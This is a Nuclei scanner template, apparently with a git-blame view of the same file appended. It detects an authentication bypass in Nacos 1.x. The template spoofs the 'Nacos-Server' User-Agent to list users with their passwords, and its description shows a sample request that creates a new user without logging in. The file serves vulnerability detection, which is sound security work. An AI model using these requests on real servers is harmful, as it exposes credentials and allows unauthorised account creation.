nuclei-templates/misconfiguration/unauthenticated-nacos-acces...

id: unauthenticated-nacos-access

info:
  name: Nacos 1.x - Authentication Bypass
  author: taielab,pikpikcu
  severity: critical
  description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data."
  reference:
    - https://github.com/alibaba/nacos/issues/4593
    - https://nacos.io/en-us/docs/auth.html
  tags: nacos,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
      - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
    headers:
      User-Agent: Nacos-Server

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "Content-Type: application/json"
        part: header

      - type: regex
        regex:
          - '"username":'
          - '"password":'
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/20
few updates 2021-01-06 07:29:33 +00:00			`id: unauthenticated-nacos-access`
Nacos-auth-bypass 2021-01-06 03:54:47 +00:00
			`info:`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00			`name: Nacos 1.x - Authentication Bypass`
Updated author names 2021-06-09 12:20:56 +00:00			`author: taielab,pikpikcu`
Nacos-auth-bypass 2021-01-06 03:54:47 +00:00			`severity: critical`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00			description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data."
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://github.com/alibaba/nacos/issues/4593`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00			`- https://nacos.io/en-us/docs/auth.html`
adding tags to misconfiguration 2021-03-12 08:57:14 +00:00			`tags: nacos,unauth`
Update Nacos-auth-bypass.yaml 2021-01-06 04:26:18 +00:00
Nacos-auth-bypass 2021-01-06 03:54:47 +00:00			`requests:`
Update unauthenticated-nacos-access.yaml 2021-02-26 01:56:25 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"`
			`- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"`
Update unauthenticated-nacos-access.yaml 2021-02-26 05:44:18 +00:00			`headers:`
			`User-Agent: Nacos-Server`
Update Nacos-auth-bypass.yaml 2021-01-06 04:26:18 +00:00
Nacos-auth-bypass 2021-01-06 03:54:47 +00:00			`matchers-condition: and`
			`matchers:`
Update unauthenticated-nacos-access.yaml 2021-02-26 01:56:25 +00:00
			`- type: word`
			`words:`
			`- "Content-Type: application/json"`
			`part: header`

Nacos-auth-bypass 2021-01-06 03:54:47 +00:00			`- type: regex`
			`regex:`
fixes 2021-01-10 23:20:14 +00:00			`- '"username":'`
			`- '"password":'`
Nacos-auth-bypass 2021-01-06 03:54:47 +00:00			`part: body`
Update unauthenticated-nacos-access.yaml 2021-02-26 01:56:25 +00:00			`condition: and`

Nacos-auth-bypass 2021-01-06 03:54:47 +00:00			`- type: status`
			`status:`
			`- 200`
Dashboard Content Enhancements (#4456) Dashboard Content Enhancements 2022-05-20 21:38:52 +00:00
			`# Enhanced by mp on 2022/05/20`